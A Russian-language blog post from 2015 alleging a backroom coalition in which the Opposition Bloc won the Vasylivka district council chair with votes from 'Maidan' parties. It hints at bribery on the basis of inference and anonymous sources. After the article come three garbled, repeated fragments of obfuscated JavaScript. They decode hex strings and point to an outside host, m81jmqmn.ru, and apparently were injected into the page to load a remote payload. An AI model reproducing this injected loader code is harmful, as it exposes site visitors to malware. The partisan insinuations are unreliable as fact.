ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

«ДОГОВОРНЯК». Как в Васильевском райсовете «Оппоблок» и майданные партии делили портфели

Posted by operkor на Ноябрь 17, 2015

1По результатам выборов в Васильевский районный совет Запорожской области 15 депутатских мест получил «Оппозиционный блок». Однако удивительным в данной ситуации можно считать не количество граждан, в очередной раз поверивших предвыборной риторике «Оппоблока». Уже в самом начале работы Васильевского райсовета фракция-победитель обзавелась неожиданными союзниками из партий, декларирующих патриотические ценности. Такой поворот событий огорчил избирателей, голосовавших, в первую очередь, за идею объединения конструктивных сил.

12 ноября состоялось первое пленарное заседание новоизбранного райсовета, на котором депутаты избирали себе председателя. Были выдвинуты две кандидатуры – Дениса Калинина от «Оппоблока» и Сергея Калимана от Аграрной партии. Результаты голосования оказались неожиданными. Во втором туре главой райсовета был избран «оппоблоковец» Калинин, получивший 22 голоса из 36. Его поддержал не только «Оппоблок», но и члены других фракций.

За Калимана проголосовали 9 депутатов, еще 3 воздержались. «Наш край» и Аграрная партия, голосовавшие за кандидатуру Калимана, оказались в меньшинстве против внезапно образовавшейся в райсовете «широкой коалиции».

Представители каких политических сил поддержали кандидата от «Оппоблока», определить нетрудно, несмотря на то что голосование было тайным. Достаточно сопоставить некоторые цифры и факты.

В Васильевский райсовет, кроме уже названных партий, вошли депутаты от «Солидарности», «Батьківщини» и Радикальной партии Ляшко — в сумме это 10 депутатов. Казалось бы, у них была возможность сохранить инкогнито в таком сомнительном деле, как избрание главой районного совета человека из стана политических противников. Однако дальнейшие действия так называемого большинства позволяют как минимум сделать выводы о партийной принадлежности тайных доброжелателей «Оппоблока».

Теми же 22 голосами заместителем главы райсовета был избран представитель «Солидарности» Андрей Дашковский. В рамках договоренности «широкой коалиции» советником главы райсовета в скором времени будет назначен еще один «майдановец» — Анатолий Шевченко, до сих пор позиционировавший себя как борца с коррупцией и «Оппозиционным блоком».

Налицо синхронное голосование за «ваших» и «наших». А поскольку фракция «Солидарности» в Васильевском райсовете насчитывает 4 депутата, методом исключения можно сделать вывод, что оставшихся троих сторонников «Оппоблока» следует искать в рядах фракций «Батьківщини» и Радикальной партии.

19.Сергей Джуган— Во время голосования бросалось в глаза, как депутаты всех «коалиционных» фракций нервничали, а затем сбивчиво пытались объяснить свой выбор, явно его стесняясь, — говорит депутат Васильевского райсовета от «Нашего края» Сергей Джуган. – Поведение депутатов вызывает серьезные сомнения в том, что такое объединение произошло из соображений политической целесообразности и желания работать на благо района. Очень похоже, что многих депутатов просто вынудили или заинтересовали проголосовать определенным образом. Сомневаюсь, что созданное, или согнанное, таким образом большинство сможет эффективно работать, а райсовет – принимать нужные жителям района решения.

Нельзя обойти вниманием и фигуру новоизбранного главы райсовета, занимавшего эту должность и до выборов. Бывший «регионал» Денис Калинин вначале решил баллотироваться в депутаты от партии «Наш край», и даже успел провести агитацию в СМИ от данной политсилы. Однако в ходе избирательной кампании некая «третья сила», вероятно, смогла найти для бывшего школьного учителя весомые аргументы, под влиянием которых Калинин не устоял и решил переметнуться в «Оппоблок».

Стоит также упомянуть, что в частных беседах ряд депутатов райсовета действительно говорят о том, что их коллег «заинтересовала» в таком голосовании именно эта «третья сила».

Как видим, «Оппозиционный блок» оказался не таким уж и оппозиционным — как минимум, в масштабах Васильевского района — и ловко «склонил» к сотрудничеству своих политических противников. Ранее эта партия истратила немало денег своего хозяина, Рината Ахметова, пытаясь через СМИ убедить украинцев в том, что, к примеру, партия «Наш край» — это «проект Администрации президента». Но едва выборы закончились, как вопрос, кто у кого был «в проекте», начал проясняться. И дружное голосование в Васильевском райсовете – яркий тому пример.

И еще один несомненный вывод можно сделать по результатам первого пленарного заседания Васильевского районного совета. Оппозицией в райсовете является вовсе не «Оппозиционный блок», вошедший в состав противоестественного депутатского большинства. Конструктивное противодействие этому уродливому образованию окажут, скорее всего, партии, которые остались верными своим принципам, — «Наш край» и Аграрная партия.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: